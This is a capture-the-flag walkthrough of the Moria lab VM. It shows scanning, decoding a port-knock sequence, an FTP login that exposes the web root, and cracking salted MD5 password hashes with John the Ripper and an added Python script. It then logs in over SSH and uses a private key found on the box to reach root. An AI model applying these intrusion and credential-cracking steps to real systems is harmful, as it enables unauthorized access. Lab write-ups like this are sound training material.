Moria Walkthrough

In this post I walk through the Moria VM by abatchy.

attack machine: 192.168.56.102  
target machine: 192.168.56.105  

Use Nmap to check ports and services:

Nmap scan report for 192.168.56.105  
Host is up (0.00038s latency).  
Not shown: 997 closed ports  
PORT   STATE SERVICE  
21/tcp open  ftp  
22/tcp open  ssh  
80/tcp open  http  
MAC Address: 08:00:27:1A:73:01 (Oracle VirtualBox virtual NIC)  

Start with port 80. The page only shows an image, so run dirb to look for more:

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/cgi-bin/ (CODE:403|SIZE:210)                                                                
==> DIRECTORY: http://192.168.56.105/w/

---- Entering directory: http://192.168.56.105/w/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

Walking down the listable directory w leads to /w/h/i/s/p/e/r/the_abyss/, and each refresh of that page shows a different message. Collected, they look like this:

root@evilc:/home/moria# cat web_message  
"Knock knock" 
Balin: "Be quiet, the Balrog will hear you!"  
"Is this the end?" 
Maeglin:"The Balrog is not around, hurry!"  
Telchar to Thrain:"That human is slow, don't give up yet"  
Oin:"Stop knocking!"  
Dain:"Is that human deaf? Why is it not listening?"  
"Eru! Save us!" 
"Too loud!" 
Nain:"Will the human get the message?"  
Ori:"Will anyone hear us?"  

That gives a list of names that may be SSH or FTP usernames. The more interesting part is the repeated "knock" and "listening" hints, which point at port knocking. Running Wireshark on the attack machine, I saw the target hitting a sequence of ports: 77, 101, 108, 108, 111, 110, 54, 57. These are all printable ASCII codes, so decode them with Python:

root@evilc:/home/moria# python  
Python 2.7.11 (default, Dec  9 2015, 00:29:25)  
[GCC 5.3.1 20151205] on linux2
Type "help", "copyright", "credits" or "license" for more information.  
>>> for port in (77, 101,108,108,111,110,54,57):print(chr(port));
... 
M  
e  
l  
l  
o  
n  
6  
9  
>>> 
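The decoding step above, automated over a capture file. This is an added example, not code from the original post or from the Moria VM: it builds a small pcap in memory (constructed sample traffic, not the author's Wireshark capture), parses it with only the standard library, groups TCP SYN destination ports by (source, destination) pair, and reads each port number as a character, which is what the chr() loop does by hand. The direction is an assumption: the target is taken to be the one knocking, toward the attack machine, which is what the "why is it not listening?" hint suggests. The names build_frame, build_pcap, iter_packets, syn_fields, knock_sequences and decode_knocks are mine.

```python
"""Recover a port-knock sequence from a pcap and read it as ASCII.

Added example; not code from the original post or the Moria VM. The capture
below is constructed in memory, not the author's Wireshark capture, and the
knock direction (target -> attacker) is an assumption.
"""
import struct

PCAP_MAGIC = 0xA1B2C3D4        # classic pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1
TARGET, ATTACKER = "192.168.56.105", "192.168.56.102"   # addresses from the post


def build_frame(src_ip, dst_ip, sport, dport, flags=0x02):
    """Ethernet/IPv4/TCP frame with the given TCP flags (SYN by default).
    Checksums are left zero: this frame is only parsed, never sent."""
    eth = b"\x08\x00\x27\x00\x00\x01" + b"\x08\x00\x27\x00\x00\x02" + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 1024, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a pcap global header plus one record header per frame."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1000 + i, 0, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)


def iter_packets(pcap):
    """Yield raw frames from a pcap byte string, honouring the magic's byte order."""
    magic, = struct.unpack_from("<I", pcap, 0)
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack_from(endian + "I", pcap, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def syn_fields(frame):
    """(src_ip, dst_ip, dport) for an IPv4 TCP SYN without ACK, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    tcp = 14 + ihl
    if frame[23] != 6 or len(frame) < tcp + 14:     # IP protocol 6 = TCP
        return None
    flags = frame[tcp + 13]
    if flags & 0x12 != 0x02:          # SYN set and ACK clear: a fresh connection attempt
        return None
    src_ip = ".".join(str(b) for b in frame[26:30])
    dst_ip = ".".join(str(b) for b in frame[30:34])
    dport = struct.unpack_from("!H", frame, tcp + 2)[0]
    return src_ip, dst_ip, dport


def knock_sequences(pcap):
    """Map (src_ip, dst_ip) -> list of SYN destination ports in capture order."""
    seqs = {}
    for frame in iter_packets(pcap):
        fields = syn_fields(frame)
        if fields:
            src, dst, dport = fields
            seqs.setdefault((src, dst), []).append(dport)
    return seqs


def decode_knocks(ports):
    """Read each port number as a printable ASCII code; '?' for anything else."""
    return "".join(chr(p) if 32 <= p < 127 else "?" for p in ports)


# Constructed capture: the target knocks eight ports on the attacker, mixed with
# an unrelated SYN from the attacker and a SYN/ACK that must be ignored.
SAMPLE_PCAP = build_pcap(
    [build_frame(TARGET, ATTACKER, 40000 + i, p)
     for i, p in enumerate((77, 101, 108, 108, 111, 110, 54, 57))]
    + [build_frame(ATTACKER, TARGET, 51000, 80),
       build_frame(TARGET, ATTACKER, 80, 51000, flags=0x12)]
)

if __name__ == "__main__":
    for (src, dst), ports in knock_sequences(SAMPLE_PCAP).items():
        print(f"{src} -> {dst}: {ports} -> {decode_knocks(ports)!r}")
```

To use it on a real capture, save the Wireshark session as classic pcap (not pcapng) and pass the file's bytes to knock_sequences; grouping by address pair is what separates the knocks from the attacker's own scan traffic, and the SYN-without-ACK filter drops the replies.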

What is Mellon69, a username or a password? Googling the image served on port 80 answered that: in Tolkien, "Mellon" is the password that opens the Doors of Durin into Moria. So Mellon69 is a password, and I still need a username.

The FTP banner gives one away: Balrog. Logging in as Balrog with Mellon69 works:

root@evilc:/home/moria# ftp 192.168.56.105  
Connected to 192.168.56.105.  
220 Welcome Balrog!  
Name (192.168.56.105:evilc): Balrog  
331 Please specify the password.  
Password:  
230 Login successful.  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp>  

Balrog's FTP session can browse the filesystem; check the web root /var/www/html:

ftp> cd /var/www/html  
250 Directory successfully changed.  
ftp> ls  
200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.  
drwxr-xr-x    2 0        0              23 Mar 12 20:38 QlVraKW4fbIkXau9zkAPNGzviT3UKntl  
-r--------    1 48       48             85 Mar 12 19:55 index.php
-r--------    1 48       48         161595 Mar 11 23:12 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12 04:50 w  
226 Directory send OK.  
ftp>  

The listing reveals a directory with an unguessable name, QlVraKW4fbIkXau9zkAPNGzviT3UKntl, which dirb's wordlist would never have hit; because the FTP account can read the web root, no guessing was needed. Browsing to it serves a page (its index.php) with a table of prisoners and passkeys:

Prisoner's name   Passkey  
Balin   c2d8960157fc8540f6d5d66594e165e0  
Oin    727a279d913fba677c490102b135e51e  
Ori    8c3c3152a5c64ffb683d78efc3520114  
Maeglin    6ba94d6322f53f30aca4f34960203703  
Fundin    c789ec9fae1cd07adfc02930a39486a1  
Nain    fec21f5c7dcf8e5e54537cfda92df5fe  
Dain    6a113db1fd25c5501ec3a5936d817c29  
Thrain    7db5040c351237e8332bfbba757a1019  
Telchar    dd272382909a4f51163c77da6356cc6f  

The page source has an HTML comment listing the salts, one per row in table order, and the hash scheme:

<!--

6MAp84  
bQkChe  
HnqeN4  
e5ad5s  
g9Wxv7  
HCCsxP  
cC5nTr  
h8spZR  
tb9AWe

MD5(MD5(Password).Salt)

-->

John the Ripper's dynamic formats cover this scheme: dynamic_6 is md5(md5($p).$s). So write each entry into prisoner.txt as username:hash$salt, taking the salts from the comment in table order:

root@evilc:/home/moria# cat prisoner.txt  
Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84  
Oin:727a279d913fba677c490102b135e51e$bQkChe  
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4  
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s  
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7  
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP  
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr  
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR  
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe  
root@evilc:/home/moria# john --format=dynamic_6 prisoner.txt  

Eight of the nine hashes crack (Balin's does not appear in the output):

Nain:warrior  
Dain:abcdef  
Telchar:magic  
Oin:rainbow  
Ori:spanky  
Maeglin:fuckoff  
Thrain:darkness  
Fundin:hunter2  
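The hash construction and the john input format above, rebuilt in a few lines so the cracked pairs can be verified without john. This is an added example, not code from the original post or from John the Ripper: it implements the scheme the HTML comment describes (hex MD5 of the password, salt appended, MD5 again, which john calls dynamic_6), emits prisoner.txt lines in the user:hash$salt form used above, and tries a constructed candidate list (not the author's wordlist) against the table from the page. The names md5_hex, dynamic_6, john_line, crack, PRISONERS and CANDIDATES are mine.

```python
"""Rebuild MD5(MD5(password).salt) hashes and run a small dictionary check.

Added example; not code from the original post or from John the Ripper.
The candidate list is constructed here and is not the author's wordlist.
"""
import hashlib


def md5_hex(data):
    """Lowercase hex MD5 of a str or bytes value."""
    if isinstance(data, str):
        data = data.encode()
    return hashlib.md5(data).hexdigest()


def dynamic_6(password, salt):
    """md5(md5($p).$s): the inner digest is used as its 32-char lowercase hex string,
    then the salt is appended as plain ASCII before the outer MD5."""
    return md5_hex(md5_hex(password) + salt)


def john_line(user, digest, salt):
    """One prisoner.txt line in the user:hash$salt form used with --format=dynamic_6."""
    return f"{user}:{digest}${salt}"


def crack(table, candidates):
    """table: {user: (digest, salt)}. Returns {user: password} for every digest
    reproduced by some candidate; users with no match are left out (as john
    left Balin out above)."""
    found = {}
    for user, (digest, salt) in table.items():
        for pw in candidates:
            if dynamic_6(pw, salt) == digest.lower():
                found[user] = pw
                break
    return found


# Hashes from the page's table, salts from the HTML comment (same order).
PRISONERS = {
    "Balin":   ("c2d8960157fc8540f6d5d66594e165e0", "6MAp84"),
    "Oin":     ("727a279d913fba677c490102b135e51e", "bQkChe"),
    "Ori":     ("8c3c3152a5c64ffb683d78efc3520114", "HnqeN4"),
    "Maeglin": ("6ba94d6322f53f30aca4f34960203703", "e5ad5s"),
    "Fundin":  ("c789ec9fae1cd07adfc02930a39486a1", "g9Wxv7"),
    "Nain":    ("fec21f5c7dcf8e5e54537cfda92df5fe", "HCCsxP"),
    "Dain":    ("6a113db1fd25c5501ec3a5936d817c29", "cC5nTr"),
    "Thrain":  ("7db5040c351237e8332bfbba757a1019", "h8spZR"),
    "Telchar": ("dd272382909a4f51163c77da6356cc6f", "tb9AWe"),
}

# Constructed candidate list: the passwords john reported plus a few decoys.
CANDIDATES = ["password", "123456", "warrior", "abcdef", "magic", "rainbow",
              "spanky", "fuckoff", "darkness", "hunter2", "moria", "mellon"]

if __name__ == "__main__":
    for user, (digest, salt) in PRISONERS.items():
        print(john_line(user, digest, salt))
    for user, pw in crack(PRISONERS, CANDIDATES).items():
        print(f"{user}: {pw}")
```

Two details matter when reproducing a scheme like this: the inner digest must be fed to the outer hash as its hex text, not its raw 16 bytes, and the salt goes after it, not before. Getting either wrong gives hashes that never match, and john would silently report nothing cracked.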

Trying each pair over SSH, Ori's works:

root@evilc:/home/moria# ssh Ori@192.168.56.105  
The authenticity of host '192.168.56.105 (192.168.56.105)' can't be established.  
ECDSA key fingerprint is SHA256:f36EkYTzFZo1NijPX18gGR4AfGFsDN2QJm6FwfGIjxs.  
Are you sure you want to continue connecting (yes/no)? yes  
Warning: Permanently added '192.168.56.105' (ECDSA) to the list of known hosts.  
Ori@192.168.56.105's password:  
Last login: Sun Mar 12 22:57:09 2017  
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)  
-bash-4.2$ ls
poem.txt  
-bash-4.2$ cat poem.txt
Ho! Ho! Ho! to the bottle I go  
To heal my heart and drown my woe.  
Rain may fall and wind may blow,  
And many miles be still to go,  
But under a tall tree I will lie,  
And let the clouds go sailing by. 

PS: Moria will not fall!  
-bash-4.2$  

Looking further, there is a .ssh directory:

-bash-4.2$ ls -la
total 8  
drwx------  3 Ori  notBalrog  55 Mar 12 22:57 .  
drwxr-x---. 4 root notBalrog  32 Mar 14 00:36 ..  
-rw-------  1 Ori  notBalrog   1 Mar 14 00:12 .bash_history
-rw-r--r--  1 root root      225 Mar 13 23:53 poem.txt
drwx------  2 Ori  notBalrog  57 Mar 12 22:57 .ssh  
-bash-4.2$ cd .ssh
-bash-4.2$ ls -la
total 12  
drwx------ 2 Ori notBalrog   57 Mar 12 22:57 .  
drwx------ 3 Ori notBalrog   55 Mar 12 22:57 ..  
-rw------- 1 Ori notBalrog 1679 Mar 12 21:13 id_rsa
-rw-r--r-- 1 Ori notBalrog  392 Mar 12 21:13 id_rsa.pub
-rw-r--r-- 1 Ori notBalrog  171 Mar 12 22:57 known_hosts
-bash-4.2$ cat known_hosts 
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=  
-bash-4.2$ 

known_hosts shows Ori has previously connected to 127.0.0.1 over SSH, and id_rsa is a private key. If root's authorized_keys trusts that key, it is a direct route to root. Try it:

-bash-4.2$ ssh root@127.0.0.1 -i id_rsa
Last login: Fri Apr 28 18:01:27 2017  
[root@Moria ~]# 

Get the flag (and, to confirm why the key worked, compare the fingerprint of Ori's id_rsa.pub with the entries in root's authorized_keys):

[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)  
[root@Moria ~]# cd /root
[root@Moria ~]# ls
0  anaconda-ks.cfg  Desktop  flag.txt  hosts  
[root@Moria ~]# cat flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;  
The old that is strong does not wither,  
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,  
A light from the shadows shall spring;  
Renewed shall be blade that was broken,  
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?  
-Abatchy

[root@Moria ~]# 

Done, amazing.